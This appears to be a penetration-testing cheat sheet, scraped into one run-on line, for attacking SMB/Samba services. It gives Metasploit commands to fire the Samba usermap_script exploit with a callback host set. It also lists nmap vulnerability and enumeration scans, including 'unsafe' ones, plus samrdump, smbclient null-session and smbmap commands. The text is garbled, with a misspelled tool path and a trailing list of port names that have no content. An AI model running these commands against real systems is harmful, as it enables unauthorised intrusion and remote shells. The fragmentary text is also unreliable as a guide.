Msfconsole use exploit/multi/samba/usermap_script set lhost 192.168.0.X set rhost $IP run Msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_validate.rc Msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_checks.rc Nmap -script smb-vuln * -p139,445 -T4 -Pn $IP # Check common security concerns usr/share/doc/python3-impacket/examples/samrdump.py $IP # Connect to username shares Smbclient -L \\\\ $IP \\ # Check null sessions Nmap -script smb-enum-shares -p139,445 -T4 -Pn $IP Smbmap -H $IP -R echo exit | smbclient -L \\\\ Nmap -script=smb-enum * -script-args=unsafe=1 -T5 $IP # Get Version Windows create SMB Server transfer files.Port 10000 - Network Data Management Protocol (ndmp).Port 9100 - Raw Printing (JetDirect, AppSocket, PDL-datastream).Port 8009 - Apache JServ Protocol (AJP).Port 4369 - Erlang Port Mapper Daemon (epmd).Port 631 - Internet Printing Protocol(IPP).
